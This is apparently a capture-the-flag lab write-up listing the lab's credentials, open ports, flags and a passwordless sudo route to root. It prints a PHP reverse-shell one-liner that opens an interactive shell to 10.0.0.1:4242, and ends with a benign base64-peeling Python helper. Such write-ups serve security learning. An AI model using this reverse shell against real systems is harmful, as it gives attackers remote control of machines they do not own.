Findings Log

  • Username: "R1ckRul3s"

  • Password: "Wubbalubbadubdub"

  • Ports open:

    • 22 --> OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

    • 80 --> Apache httpd 2.4.18 ((Ubuntu))

  • Backend uses PHP

  • Login Page: /login.php

  • First Ingredient --> mr. meeseek hair

  • In the /portal.php source code, there is a base64-encoded comment that doesn't decode to anything:

    • Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==
    • I went down the rabbit hole. Seriously. F*** them.

    • This decodes to "rabbit hole" if you base64-decode it like 10 times. I literally sat there and kept decrypting it wondering if I would get something juicy.

  • From Command Console you can gain RCE with:

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
  • In /home/rick you can find the second ingredient: 1 jerry tear

  • Use sudo su to become root without needing a password.

  • The third ingredient is located in /root/3rd.txt

    • fleeb juice
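
The repeated decoding described for the /portal.php comment can be automated. This is an added example, not part of the original write-up: it peels base64 layers until the result is no longer valid base64 of printable ASCII, with a bound on the number of layers. The helper names `peel_base64` and `wrap` are hypothetical, and the sample input is constructed by the script rather than copied from the page.

```python
import base64
import binascii

MAX_LAYERS = 32  # safety bound so crafted input cannot keep the loop running


def peel_base64(blob: str, max_layers: int = MAX_LAYERS):
    """Strip nested base64 layers; return (layer_count, innermost_text)."""
    current = blob.strip()
    layers = 0
    while layers < max_layers:
        # Tolerate wrong padding: drop the '=' run and re-pad to a multiple of 4.
        body = current.rstrip("=")
        if not body or len(body) % 4 == 1:
            break  # empty, or a length no base64 string can have
        padded = body + "=" * (-len(body) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # not base64, or it decodes to binary: stop at this layer
        if not text.isprintable():
            break  # control characters: treat the previous layer as innermost
        current = text.strip()
        layers += 1
    # Heuristic: plaintext that is itself valid base64 of printable ASCII
    # would be peeled one layer too far.
    return layers, current


def wrap(text: str, times: int) -> str:
    """Build a constructed sample by base64-encoding `text` `times` times."""
    data = text.encode()
    for _ in range(times):
        data = base64.b64encode(data)
    return data.decode()


if __name__ == "__main__":
    sample = wrap("rabbit hole", 7)  # constructed sample, not the page's string
    count, inner = peel_base64(sample)
    print(f"{count} layers -> {inner!r}")
```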

Last updated 2 years ago